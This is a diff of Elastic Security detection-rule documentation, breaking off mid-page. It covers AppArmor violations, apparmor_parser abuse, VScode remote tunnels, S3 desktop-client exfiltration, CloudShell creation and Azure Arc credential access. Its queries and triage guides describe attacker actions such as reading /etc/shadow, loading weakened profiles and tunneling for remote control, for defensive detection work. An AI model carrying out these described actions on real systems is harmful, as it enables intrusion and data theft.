+Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-auditd_manager.auditd-*
+* auditbeat-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt
+* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Linux
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Data Source: Auditd Manager
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating AppArmor Policy Violation Detected*
+
+
+This alert shows that AppArmor blocked or limited a Linux process because it tried to act outside its assigned security profile, which can reveal privilege escalation, restricted file access, or defense-evasion activity being stopped by the kernel. An attacker who gains code execution in a web-facing service might try to read `/etc/shadow`, spawn a shell from the confined process, or touch protected sockets, causing this violation when AppArmor contains the behavior.
+
+
+*Possible investigation steps*
+
+
+- Determine which AppArmor profile produced the denial and what resource or capability was blocked, then judge whether the attempted action matches the application's expected behavior or suggests shell execution, credential access, or unusual network activity.
+- Build a short timeline around the event for the affected workload to identify preceding parent-child process chains, interactive sessions, failed access attempts, new persistence artifacts, or outbound connections that indicate exploitation rather than misconfiguration.
+- Review recent software deployments, package updates, profile changes, and administrator actions on the host to verify whether the violation began after a legitimate change that may require profile tuning or rollback.
+- If the denied behavior is unexpected or repeated, validate the integrity and reputation of the involved binary or script against known-good versions from the environment and inspect its execution context for signs of tampering or abuse.
+- For violations that align with malicious behavior, preserve relevant audit and system logs, contain the host or impacted service as needed, remove any confirmed malicious artifacts, and retain or harden the AppArmor policy that successfully blocked the action.
+
+
+*False positive analysis*
+
+
+- A legitimate application or package update may change binaries, file paths, or socket usage without a matching AppArmor profile update, so verify the alert timing against recent host software changes and confirm the denied path or capability is part of the application's documented normal operation.
+- An administrator-initiated maintenance task or service restart can trigger a confined process to access temporary files, logs, or helper executables outside its usual profile, so review the parent process, command line, and user context to confirm it aligns with expected maintenance activity on the host.
+
+
+*Response and remediation*
+
+
+- Isolate the affected Linux host or container from the network, stop the compromised service or process that triggered the AppArmor denial, and disable any abused user or service account to prevent additional attacker execution.
+- Remove attacker footholds by deleting unauthorized systemd units, cron jobs, startup scripts, SSH `authorized_keys` additions, dropped web shells, or replaced binaries linked to the confined process, then terminate any related child shells or reverse-connection tools.
+- Restore the workload to a known-good state by rebuilding the host or redeploying the service from a trusted image, reinstalling affected packages, validating critical files such as `/etc/passwd`, `/etc/shadow`, and application binaries against baseline hashes, and rotating any credentials the process may have reached.
+- Escalate to incident response immediately if the denial came from an internet-facing service, involved attempts to spawn a shell or read protected files, showed tampering with `/etc/apparmor.d/`, or appeared on multiple hosts, because these are strong indicators of active exploitation or wider compromise.
+- Harden the environment by keeping AppArmor in enforce mode, restoring any modified profiles, patching the vulnerable application or package the attacker abused, removing unnecessary interpreter access and write permissions for the service, and adding detections for the same blocked shell, file, or socket behaviors across similar systems.
+
+==== Setup
+
+
+
+*Setup*
+
+
+This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.
+```
+Kibana -->
+Management -->
+Integrations -->
+Auditd Manager -->
+Add Auditd Manager
+```
+`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the "audit rules" configuration box or the "auditd rule files" box by specifying a file to read the audit rules from.
+
+For this detection rule no additional audit rules are required to be added to the integration.
+
+Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+file where host.os.type == "linux" and event.type == "change" and event.action == "violated-apparmor-policy"
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Disable or Modify Tools
+** ID: T1562.001
+** Reference URL: https://attack.mitre.org/techniques/T1562/001/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc
new file mode 100644
index 0000000000..4537b3eb56
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser.asciidoc
@@ -0,0 +1,160 @@
+[[prebuilt-rule-8-19-18-apparmor-profile-compilation-via-apparmor-parser]]
+=== AppArmor Profile Compilation via apparmor_parser
+
+Detects the execution of "apparmor_parser" using the "-o" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use "apparmor_parser" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-endpoint.events.process*
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-sentinel_one_cloud_funnel.*
+* logs-auditd_manager.auditd-*
+* auditbeat-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt
+* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Linux
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Data Source: Auditd Manager
+* Data Source: Elastic Defend
+* Data Source: Elastic Endgame
+* Data Source: Crowdstrike
+* Data Source: SentinelOne
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance.
While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating AppArmor Profile Compilation via apparmor_parser*
+
+
+This alert flags a Linux process using apparmor_parser to write a compiled AppArmor policy to disk, an action administrators and package scripts use but adversaries can abuse to stage policy changes. An attacker with root access can compile a custom profile that grants a trojanized service broader file or capability access, then load it to weaken confinement and support privilege escalation or stealthy persistence.
+
+
+*Possible investigation steps*
+
+
+- Review the full command line, parent and ancestor process chain, executing user, tty or session, and working directory to determine whether the activity came from expected package management or configuration tooling versus an interactive shell.
+- Identify the source profile and output file paths, then inspect the profile for broad file access, dangerous capability grants, unconfined transitions, or complain/disable settings that would weaken confinement for sensitive binaries or services.
+- Correlate nearby events for writes under AppArmor policy directories, subsequent policy loads or reloads, package installation actions, and restarts of the targeted application to confirm whether the compiled profile was actually deployed.
+- Compare the activity against host and peer-system baselines and validate it with change records, deployment jobs, or package updates tied to the same account or system to quickly distinguish administrative maintenance from anomalous behavior.
+- If the execution is not authorized, preserve the generated profile and related scripts, restore affected policy files from a known-good source, and review recent privileged activity on the host for additional persistence or defense-evasion changes.
+
+
+*False positive analysis*
+
+
+- Operating system package installation or upgrade can invoke apparmor_parser with -o to precompile a vendor profile during a post-install action; verify this by reviewing the parent process and nearby package-management activity for an authorized update at the same time.
+- A system administrator may compile a new or modified local AppArmor profile while hardening or troubleshooting a service; verify the executing user, source and output file paths, and whether the change aligns with approved maintenance or documented policy updates.
+
+
+*Response and remediation*
+
+
+- Isolate the affected Linux host from the network and stop any service whose confinement was altered if the compiled profile was loaded or written into `/etc/apparmor.d/` or AppArmor cache directories, to prevent further policy abuse.
+- Preserve the malicious source profile, compiled output, invoking script, and shell history for evidence, then delete unauthorized files from `/etc/apparmor.d/`, `/etc/apparmor.d/disable/`, and cache paths and unload the rogue policy with approved AppArmor administration commands.
+- Remove attacker persistence by reviewing and cleaning systemd unit files, timers, cron entries, package maintainer scripts, login startup files, and sudoers changes that call `apparmor_parser` or restore the profile at boot.
+- Reset or revoke credentials used on the host, including root and sudo-capable accounts, service account secrets, and unauthorized `authorized_keys`, if the attacker had interactive access or modified privileged services.
+- Restore AppArmor policy files, affected binaries, and related service configurations from trusted packages, configuration management, or a gold image, then reload AppArmor in enforce mode and confirm the targeted program is confined by the expected profile.
+- Escalate to incident response immediately if the custom profile targeted `sshd`, `sudo`, container runtimes, web-facing daemons, or appears on multiple hosts, and harden the environment by limiting write access to AppArmor policy paths, alerting on future `apparmor_parser -o` use outside approved package activity, and enforcing change control for policy updates.
+
+
+==== Setup
+
+
+
+*Setup*
+
+
+This rule requires data coming in from Elastic Defend.
+
+
+*Elastic Defend Integration Setup*
+
+Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.
+
+
+*Prerequisite Requirements:*
+
+- Fleet is required for Elastic Defend.
+- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation].
+
+
+*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:*
+
+- Go to the Kibana home page and click "Add integrations".
+- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
+- Click "Add Elastic Defend".
+- Configure the integration name and optionally add a description.
+- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads".
+- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide].
+- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions"
+- Enter a name for the agent policy in "New agent policy name".
If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
+For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide].
+- Click "Save and Continue".
+- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
+For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide].
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+process where host.os.type == "linux" and event.type == "start" and
+event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started") and
+process.name == "apparmor_parser" and process.args in ("--ofile*", "-o*", "--output*")
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Defense Evasion
+** ID: TA0005
+** Reference URL: https://attack.mitre.org/tactics/TA0005/
+* Technique:
+** Name: Impair Defenses
+** ID: T1562
+** Reference URL: https://attack.mitre.org/techniques/T1562/
+* Sub-technique:
+** Name: Disable or Modify Tools
+** ID: T1562.001
+** Reference URL: https://attack.mitre.org/techniques/T1562/001/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc
new file mode 100644
index 0000000000..e05c6024b7
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel.asciidoc
@@ -0,0 +1,132 @@
+[[prebuilt-rule-8-19-18-attempt-to-establish-vscode-remote-tunnel]]
+=== Attempt to Establish VScode Remote Tunnel
+
+Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-endpoint.events.process-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* logs-system.security*
+* logs-windows.sysmon_operational-*
+* winlogbeat-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://badoption.eu/blog/2023/01/31/code_c2.html
+* https://code.visualstudio.com/docs/remote/tunnels
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Command and Control
+* Data Source: Elastic Endgame
+* Data Source: Elastic Defend
+* Data Source: Sysmon
+* Data Source: SentinelOne
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: Windows Security Event Logs
+* Data Source: Crowdstrike
+* Resources: Investigation Guide
+
+*Version*: 110
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Attempt to Establish VScode Remote Tunnel*
+
+
+Visual Studio Code (VScode) offers a remote tunnel feature enabling developers to connect to remote environments seamlessly.
While beneficial for legitimate remote development, adversaries can exploit this to establish unauthorized access or control over systems. The detection rule identifies suspicious use of VScode's tunnel command, focusing on specific command-line arguments and process behaviors, to flag potential misuse indicative of command and control activities.
+
+
+*Possible investigation steps*
+
+
+- Review the process details to confirm the presence of the "tunnel" argument in the command line, which indicates an attempt to establish a remote tunnel session.
+- Check the parent process name to ensure it is not "Code.exe" when the process name is "code-tunnel.exe" with the "status" argument, as this is an exception in the rule.
+- Investigate the origin of the process by examining the user account and machine from which the process was initiated to determine if it aligns with expected usage patterns.
+- Analyze network logs to identify any unusual or unauthorized connections to GitHub or remote VScode instances that may suggest malicious activity.
+- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Sysmon, or Microsoft Defender for Endpoint to gather additional context on the activity.
+- Assess the risk and impact by determining if the system or user account has been involved in previous suspicious activities or if there are any indicators of compromise.
+
+
+*False positive analysis*
+
+
+- Legitimate remote development activities using VScode's tunnel feature may trigger the rule. Users can create exceptions for known developer machines or specific user accounts frequently using this feature for authorized purposes.
+- Automated scripts or deployment tools that utilize VScode's remote tunnel for legitimate operations might be flagged. Consider excluding these processes by identifying their unique command-line arguments or parent processes.
+- Scheduled tasks or system maintenance activities that involve VScode's remote capabilities could be misidentified as threats. Review and whitelist these tasks by their specific execution times or associated service accounts.
+- Development environments that frequently update or test VScode extensions might inadvertently match the rule's criteria. Exclude these environments by setting up exceptions based on their network segments or IP addresses.
+- Training or demonstration sessions using VScode's remote features for educational purposes can be mistaken for suspicious activity. Implement exclusions for these sessions by tagging them with specific event identifiers or user roles.
+
+
+*Response and remediation*
+
+
+- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration.
+- Terminate any suspicious VScode processes identified by the detection rule to halt potential command and control activities.
+- Conduct a thorough review of system logs and process histories to identify any additional indicators of compromise or lateral movement attempts.
+- Reset credentials and access tokens associated with the affected system and any connected services to mitigate unauthorized access.
+- Restore the system from a known good backup if any unauthorized changes or malware are detected.
+- Implement network segmentation to limit the ability of similar threats to spread across the environment.
+- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+process where host.os.type == "windows" and event.type == "start" and
+ process.args : "tunnel" and
+ (process.args : "--accept-server-license-terms" or
+ process.name : "code*.exe" or
+ ?process.code_signature.subject_name : "Microsoft Corporation" or
+ process.executable : ("?:\\ProgramData\\*", "?:\\Users\\Public\\*", "?:\\windows\\debug\\*",
+ "\\Device\\HarddiskVolume*\\Users\\Public\\*", "\\Device\\HarddiskVolume*\\ProgramData\\*", "\\Device\\HarddiskVolume*\\windows\\debug\\*")) and
+ not (process.name == "code-tunnel.exe" and process.args == "status" and process.parent.name == "Code.exe")
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Command and Control
+** ID: TA0011
+** Reference URL: https://attack.mitre.org/tactics/TA0011/
+* Technique:
+** Name: Remote Access Tools
+** ID: T1219
+** Reference URL: https://attack.mitre.org/techniques/T1219/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc
new file mode 100644
index 0000000000..345d8d5f7c
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user.asciidoc
@@ -0,0 +1,141 @@
+[[prebuilt-rule-8-19-18-aws-api-activity-from-uncommon-s3-client-by-rare-user]]
+=== AWS API Activity from Uncommon S3 Client by Rare User
+
+Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows.
+
+*Rule type*: new_terms
+
+*Rule indices*:
+
+* logs-aws.cloudtrail-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://s3browser.com/
+* https://cyberduck.io/
+* https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+* https://attackevals.github.io/ael/enterprise/scattered_spider/emulation_plan/scattered_spider_scenario/
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: AWS
+* Data Source: Amazon Web Services
+* Data Source: AWS CloudTrail
+* Data Source: AWS S3
+* Tactic: Exfiltration
+* Use Case: Threat Detection
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and Analysis*
+
+
+
+*Investigating AWS API Activity from Uncommon S3 Client by Rare User*
+
+
+S3 Browser and Cyberduck are graphical clients for Amazon S3 that allow users to browse, upload, download, and manage S3 objects. While legitimate tools, they are uncommonly used in enterprise environments where organizations typically standardize on AWS CLI, SDKs, or console access.
The presence of these tools may indicate unauthorized data access or exfiltration activity.
+
+This is a https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule[New Terms] rule that identifies the first time a specific user within an account makes API calls using S3 Browser or Cyberduck user agent strings. Threat actors have been observed using these tools for their intuitive interface and bulk data transfer capabilities during post-compromise data theft operations.
+
+
+*Possible investigation steps*
+
+
+- **Identify the actor**
+ - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine which IAM principal was used.
+ - Check whether this principal normally accesses S3 and whether usage of these desktop clients is expected or authorized.
+
+- **Review accessed resources**
+ - Examine `aws.cloudtrail.resources.arn` to identify which S3 buckets and objects were accessed.
+ - Determine whether the accessed data is sensitive, confidential, or subject to data protection policies.
+ - Look for patterns indicating bulk downloads or systematic enumeration of bucket contents.
+
+- **Analyze the actions performed**
+ - Review `event.action` to understand what operations were performed (e.g., `GetObject`, `ListBucket`, `PutObject`).
+ - High volumes of `GetObject` calls may indicate data exfiltration.
+ - `PutObject` calls to external buckets could indicate data staging for exfiltration.
+
+- **Inspect source network context**
+ - Review `source.ip` and `source.geo` fields to determine the origin of the request.
+ - Check whether the IP belongs to corporate infrastructure, VPN, or an unexpected external location.
+ - External IPs combined with these desktop client tools are high-risk indicators.
+
+- **Correlate with surrounding activity**
+ - Search for additional CloudTrail events from the same access key or session.
+ - Look for preceding credential theft indicators such as `GetSecretValue`, `CreateAccessKey`, or console logins.
+ - Check for cross-account transfers or `CreateBucket` calls in external accounts.
+
+
+*False positive analysis*
+
+
+- **Authorized data migration or backup activities** may use these tools. Confirm with data engineering or IT teams.
+- **Developer testing** in non-production environments may occasionally involve these clients. Validate the environment and data sensitivity.
+- **Third-party integrations** using Cyberduck libraries may generate this user agent. Verify the automation context.
+
+
+*Response and remediation*
+
+
+- **If unauthorized**, immediately revoke or rotate the affected access keys and invalidate active sessions.
+- **Assess data exposure** by reviewing which objects were accessed and determining if sensitive data was compromised.
+- **Notify security operations** and initiate incident response procedures if exfiltration is confirmed.
+- **Implement preventive controls** such as S3 bucket policies restricting access by user agent or requiring VPC endpoints.
+
+
+*Additional information*
+
+- **https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/[AWS IR Playbooks]**
+- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]**
+- **https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/[AWS Knowledge Center – Security Best Practices]**
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset: "aws.cloudtrail"
+ and user_agent.original: (*S3 Browser* or *Cyberduck*)
+ and event.outcome: "success"
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Exfiltration
+** ID: TA0010
+** Reference URL: https://attack.mitre.org/tactics/TA0010/
+* Technique:
+** Name: Exfiltration Over Web Service
+** ID: T1567
+** Reference URL: https://attack.mitre.org/techniques/T1567/
+* Sub-technique:
+** Name: Exfiltration to Cloud Storage
+** ID: T1567.002
+** Reference URL: https://attack.mitre.org/techniques/T1567/002/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc
new file mode 100644
index 0000000000..b544a5e3c3
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-aws-cloudshell-environment-created.asciidoc
@@ -0,0 +1,137 @@
+[[prebuilt-rule-8-19-18-aws-cloudshell-environment-created]]
+=== AWS CloudShell Environment Created
+
+Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions.
+
+*Rule type*: query
+
+*Rule indices*:
+
+* filebeat-*
+* logs-aws.cloudtrail-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://aws-samples.github.io/threat-technique-catalog-for-aws/Techniques/T1059.009.html
+* https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: AWS
+* Data Source: Amazon Web Services
+* Data Source: AWS CloudTrail
+* Data Source: AWS CloudShell
+* Use Case: Threat Detection
+* Tactic: Execution
+* Resources: Investigation Guide
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating AWS CloudShell Environment Created*
+
+
+AWS CloudShell is a browser-based shell environment that provides instant command-line access to AWS resources without requiring local CLI installation or credential configuration. While this is convenient for legitimate administrators, it also provides adversaries with a powerful tool if they gain access to a compromised AWS console session.
+
+This rule detects when a CloudShell environment is created via the `CreateEnvironment` API. This event occurs when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region (each region maintains a separate environment).
+
+
+*Possible investigation steps*
+
+
+- **Identify the actor**
+ - Review `aws.cloudtrail.user_identity.arn` or `user.name` to determine which IAM principal created the CloudShell environment.
+ - Check `aws.cloudtrail.user_identity.type` to identify whether this is an IAM user or an assumed role session.
+ - Verify if this user typically performs command-line or administrative operations.
+
+- **Analyze the source context**
+ - Review `source.ip` and `source.geo` fields to verify the request origin matches expected administrator locations.
+ - Check `user_agent.original` to confirm the request came from a browser session.
+ - Look for the preceding `ConsoleLogin` event to understand how the session was established.
+
+- **Correlate with surrounding activity**
+ - Look for any IAM operations (CreateAccessKey, CreateUser, AttachRolePolicy) that occurred after CloudShell was accessed.
+ - Check for data exfiltration patterns or reconnaissance activity from the same session.
+
+- **Assess the broader context**
+ - Determine if this user has a legitimate need for CloudShell access based on their role.
+ - Review recent access patterns for the console session that initiated CloudShell.
+ - Check if MFA was used for the console login.
+
+
+*False positive analysis*
+
+
+- Administrators routinely using CloudShell for AWS management tasks will trigger this rule. Consider tuning for known admin users if noise is a concern.
+- Users accessing CloudShell in a new AWS region will generate a `CreateEnvironment` event even if they have used CloudShell before in other regions.
+- Training or certification activities may involve CloudShell environment creation.
+
+
+*Response and remediation*
+
+
+- If unauthorized, immediately terminate the console session to revoke CloudShell access.
+- Review and revoke any credentials or resources created during the CloudShell session.
+- Consider restricting CloudShell access via SCPs or IAM policies for sensitive accounts or users who do not require it.
+- Implement session duration limits to reduce the window of opportunity for console session abuse.
+- Enable MFA for all console logins to reduce the risk of session compromise.
+
+
+*Additional information*
+
+
+- **https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]**
+- **https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs[AWS Customer Playbook Framework]**
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+event.dataset: "aws.cloudtrail"
+ and event.provider: "cloudshell.amazonaws.com"
+ and event.action: "CreateEnvironment"
+ and event.outcome: "success"
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Execution
+** ID: TA0002
+** Reference URL: https://attack.mitre.org/tactics/TA0002/
+* Technique:
+** Name: Command and Scripting Interpreter
+** ID: T1059
+** Reference URL: https://attack.mitre.org/techniques/T1059/
+* Sub-technique:
+** Name: Cloud API
+** ID: T1059.009
+** Reference URL: https://attack.mitre.org/techniques/T1059/009/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc
new file mode 100644
index 0000000000..f07914a2d4
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source.asciidoc 
@@ -0,0 +1,125 @@
+[[prebuilt-rule-8-19-18-azure-arc-cluster-credential-access-by-identity-from-unusual-source]]
+=== Azure Arc Cluster Credential Access by Identity from Unusual Source
+
+Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time.
+
+*Rule type*: new_terms
+
+*Rule indices*:
+
+* logs-azure.activitylogs-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect
+* https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy
+* https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence
+* https://nvd.nist.gov/vuln/detail/cve-2022-37968
+
+*Tags*:
+
+* Domain: Cloud
+* Data Source: Azure
+* Data Source: Azure Arc
+* Data Source: Azure Activity Logs
+* Use Case: Threat Detection
